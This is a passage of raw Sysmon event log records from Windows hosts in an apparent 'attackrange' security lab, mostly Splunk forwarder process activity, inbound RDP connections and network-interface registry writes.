Files\SplunkUniversalForwarder\bin\splunkd.exe{5EBD8912-88BF-6151-F879-00000000FC01}1020C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001048296Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:02:55.517{5EBD8912-88BF-6151-F879-00000000FC01}1020C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{5EBD8912-7F2E-614D-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{5EBD8912-7F40-614D-2900-00000000FC01}2964C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x80000000000000001048295Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:02:55.316{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4256F2533B23EB67C51EBB0823C6FBC4,SHA256=E25F6F4567C6C9CAD0D94BE26DE71AE27484A9C024F34EE521BD0B2DCD5AF1C1,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000976887Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:02:51.882{69CF5F33-7F28-614D-1000-00000000FD01}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse87.236.208.230-59523-false10.0.1.15win-host-542.attackrange.local3389ms-wbt-server 354300x8000000000000000976886Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:02:51.629{69CF5F33-7F28-614D-1000-00000000FD01}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse185.202.2.131-32890-false10.0.1.15win-host-542.attackrange.local3389ms-wbt-server 10341000x80000000000000001048294Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:02:55.131{5EBD8912-88BE-6151-F779-00000000FC01}33805884C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{5EBD8912-7F40-614D-2900-00000000FC01}2964C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x80000000000000001048293Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:02:55.046{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=E560933781D885E4C080635C9AD83909,SHA256=7F3FF57E301130171752AD4D430B07BF3FD2EC17D15ED829174E5F1388E9C63F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000976890Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:02:56.913{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0FF82E59CD4DA1F80080696105C2131D,SHA256=52729722E35FCCE232A5A2A7639D489249F17ED8314D2FCC82E98D72FDA35E51,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001048315Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:02:56.530{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=2C9AAC7E7526613CEC26F426A39A5E99,SHA256=0986C526241D34CFBC15DBE1F87DD4933D0848D44A61B64F8F5CC3EDBF4D762A,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001048314Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:02:56.446{5EBD8912-88C0-6151-F979-00000000FC01}39644680C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{5EBD8912-7F40-614D-2900-00000000FC01}2964C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x80000000000000001048313Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:02:56.383{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8AD8132C10E9AE6D5A775B5216496810,SHA256=36C2E26B998F5D38269A85D11D9D00CF3710FF996F5F26982B134F6111B0D50E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000976889Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:02:56.741{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=D2AEAB7D352DA4FA9E27976D9F105C6A,SHA256=ACFA1F042A10E0575728A69172AD37191EF4765F3E1B308E75A807D79E86A7BE,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001048312Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:02:56.215{5EBD8912-7F41-614D-3700-00000000FC01}33683388C:\Windows\system32\conhost.exe{5EBD8912-88C0-6151-F979-00000000FC01}3964C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048311Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:02:56.215{5EBD8912-7F2F-614D-0C00-00000000FC01}8281408C:\Windows\system32\svchost.exe{5EBD8912-7F40-614D-2D00-00000000FC01}2380C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048310Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:02:56.215{5EBD8912-7F2F-614D-0C00-00000000FC01}8281408C:\Windows\system32\svchost.exe{5EBD8912-7F40-614D-2D00-00000000FC01}2380C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048309Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:02:56.215{5EBD8912-7F2F-614D-0C00-00000000FC01}8281408C:\Windows\system32\svchost.exe{5EBD8912-7F40-614D-2D00-00000000FC01}2380C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048308Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:02:56.215{5EBD8912-7F2F-614D-0C00-00000000FC01}8281408C:\Windows\system32\svchost.exe{5EBD8912-7F40-614D-2D00-00000000FC01}2380C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048307Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:02:56.215{5EBD8912-7F2D-614D-0500-00000000FC01}408368C:\Windows\system32\csrss.exe{5EBD8912-88C0-6151-F979-00000000FC01}3964C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001048306Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:02:56.215{5EBD8912-7F40-614D-2900-00000000FC01}29643516C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{5EBD8912-88C0-6151-F979-00000000FC01}3964C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001048305Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:02:56.200{5EBD8912-88C0-6151-F979-00000000FC01}3964C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{5EBD8912-7F2E-614D-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{5EBD8912-7F40-614D-2900-00000000FC01}2964C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000976893Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:02:57.913{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4289672FB40276FCE4F90D8984A9FB3C,SHA256=42843A302CBA4C6C9BA58C2DB2A50E7C53D09FD25DF044B006FF15FB354CE2F7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000976892Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:02:57.913{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=9A025449D18ED4949C97D37AC59DD4B8,SHA256=A5B5CA3590DB77F00591964ECA0A82B0475BDC7C7CCDD138B56F60BEC89F4E45,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001048317Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:02:55.791{5EBD8912-7F4C-614D-6E00-00000000FC01}3728C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-429.attackrange.local49241-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x80000000000000001048316Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:02:57.398{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E194E98E00A6FA18A5B0BB6788A478DA,SHA256=C37CEAC721496109EDFDB13E3A6492E784D5BA01A22391E74ECCFF287473AE15,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000976891Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:02:53.676{69CF5F33-7F28-614D-1000-00000000FD01}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse185.202.2.131-44227-false10.0.1.15win-host-542.attackrange.local3389ms-wbt-server 23542300x8000000000000000976895Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:02:58.928{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5D98BACC6E974A9591D5C12865C439EC,SHA256=7E8A9857FDD998881B685176BA291C8D2C3C42481BCFF3B5FD06BAC0FC7DFB7C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001048318Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:02:58.415{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=557D8C85A1588ADC24F3097ABF7D9BC5,SHA256=B009C7278EE51B4D2BF5CDF9723BC3749DB61EF9A960D2ECBBE81031716EFE82,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000976894Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:02:55.228{69CF5F33-7F28-614D-1000-00000000FD01}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse87.236.208.230-61605-false10.0.1.15win-host-542.attackrange.local3389ms-wbt-server 23542300x8000000000000000976922Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:02:59.944{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9DBFA565E21CB899C8D402E471476686,SHA256=16872FE01EA317B96CDE7128125D88F38A706B3EE5FA64D0D0C6038A6E1C0E81,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001048319Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:02:59.429{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D498827454FA836F4D977F5BD6F7B22E,SHA256=EF74CE8DFA675F007256562F2296286AB07C918859E9AEEBF5B41861A8B224AF,IMPHASH=00000000000000000000000000000000falsetrue 13241300x8000000000000000976921Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-SetValue2021-09-27 09:02:59.834{69CF5F33-7F28-614D-1400-00000000FD01}368C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\DNSRegisteredAdapters\{A4D02FEC-9CCE-49E7-8A81-FD08FF1EDCB1}\RegisteredSinceBootDWORD (0x00000001) 13241300x8000000000000000976920Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-SetValue2021-09-27 09:02:59.834{69CF5F33-7F28-614D-1400-00000000FD01}368C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\DNSRegisteredAdapters\{A4D02FEC-9CCE-49E7-8A81-FD08FF1EDCB1}\StaleAdapterDWORD (0x00000000) 13241300x8000000000000000976919Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-SetValue2021-09-27 09:02:59.834{69CF5F33-7F28-614D-1400-00000000FD01}368C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\DNSRegisteredAdapters\{A4D02FEC-9CCE-49E7-8A81-FD08FF1EDCB1}\CompartmentIdDWORD (0x00000001) 13241300x8000000000000000976918Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-SetValue2021-09-27 09:02:59.834{69CF5F33-7F28-614D-1400-00000000FD01}368C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\DNSRegisteredAdapters\{A4D02FEC-9CCE-49E7-8A81-FD08FF1EDCB1}\FlagsDWORD (0x00000002) 13241300x8000000000000000976917Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-SetValue2021-09-27 09:02:59.834{69CF5F33-7F28-614D-1400-00000000FD01}368C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\DNSRegisteredAdapters\{A4D02FEC-9CCE-49E7-8A81-FD08FF1EDCB1}\TtlDWORD (0x000004b0) 13241300x8000000000000000976916Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-SetValue2021-09-27 09:02:59.834{69CF5F33-7F28-614D-1400-00000000FD01}368C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\DNSRegisteredAdapters\{A4D02FEC-9CCE-49E7-8A81-FD08FF1EDCB1}\SentPriUpdateToIpBinary Data 13241300x8000000000000000976915Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-SetValue2021-09-27 09:02:59.834{69CF5F33-7F28-614D-1400-00000000FD01}368C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\DNSRegisteredAdapters\{A4D02FEC-9CCE-49E7-8A81-FD08FF1EDCB1}\SentUpdateToIpBinary Data 13241300x8000000000000000976914Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-SetValue2021-09-27 09:02:59.834{69CF5F33-7F28-614D-1400-00000000FD01}368C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\DNSRegisteredAdapters\{A4D02FEC-9CCE-49E7-8A81-FD08FF1EDCB1}\DnsServersBinary Data 13241300x8000000000000000976913Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-SetValue2021-09-27 09:02:59.834{69CF5F33-7F28-614D-1400-00000000FD01}368C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\DNSRegisteredAdapters\{A4D02FEC-9CCE-49E7-8A81-FD08FF1EDCB1}\HostAddrsBinary Data 13241300x8000000000000000976912Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-SetValue2021-09-27 09:02:59.834{69CF5F33-7F28-614D-1400-00000000FD01}368C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\DNSRegisteredAdapters\{A4D02FEC-9CCE-49E7-8A81-FD08FF1EDCB1}\PrimaryDomainNameattackrange.local 13241300x8000000000000000976911Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-SetValue2021-09-27 09:02:59.834{69CF5F33-7F28-614D-1400-00000000FD01}368C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\DNSRegisteredAdapters\{A4D02FEC-9CCE-49E7-8A81-FD08FF1EDCB1}\AdapterDomainName(Empty) 13241300x8000000000000000976910Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-SetValue2021-09-27 09:02:59.834{69CF5F33-7F28-614D-1400-00000000FD01}368C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\DNSRegisteredAdapters\{A4D02FEC-9CCE-49E7-8A81-FD08FF1EDCB1}\Hostnamewin-host-542 13241300x8000000000000000976909Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-SetValue2021-09-27 09:02:59.834{69CF5F33-7F28-614D-1400-00000000FD01}368C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\DNSRegisteredAdapters\{A4D02FEC-9CCE-49E7-8A81-FD08FF1EDCB1}\RegisteredSinceBootDWORD (0x00000001) 13241300x8000000000000000976908Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-SetValue2021-09-27 09:02:59.819{69CF5F33-7F28-614D-1200-00000000FD01}968C:\Windows\System32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{a4d02fec-9cce-49e7-8a81-fd08ff1edcb1}\DhcpConnForceBroadcastFlagDWORD (0x00000000) 13241300x8000000000000000976907Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-SetValue2021-09-27 09:02:59.819{69CF5F33-7F28-614D-1200-00000000FD01}968C:\Windows\System32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{a4d02fec-9cce-49e7-8a81-fd08ff1edcb1}\IsServerNapAwareDWORD (0x00000000) 13241300x8000000000000000976906Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-SetValue2021-09-27 09:02:59.819{69CF5F33-7F28-614D-1200-00000000FD01}968C:\Windows\System32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{a4d02fec-9cce-49e7-8a81-fd08ff1edcb1}\AddressTypeDWORD (0x00000000) 13241300x8000000000000000976905Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-SetValue2021-09-27 09:02:59.819{69CF5F33-7F28-614D-1200-00000000FD01}968C:\Windows\System32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{a4d02fec-9cce-49e7-8a81-fd08ff1edcb1}\LeaseTerminatesTimeDWORD (0x615196d3) 13241300x8000000000000000976904Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-SetValue2021-09-27 09:02:59.819{69CF5F33-7F28-614D-1200-00000000FD01}968C:\Windows\System32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{a4d02fec-9cce-49e7-8a81-fd08ff1edcb1}\T2DWORD (0x61519511) 13241300x8000000000000000976903Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-SetValue2021-09-27 09:02:59.819{69CF5F33-7F28-614D-1200-00000000FD01}968C:\Windows\System32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{a4d02fec-9cce-49e7-8a81-fd08ff1edcb1}\T1DWORD (0x61518fcb) 13241300x8000000000000000976902Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-SetValue2021-09-27 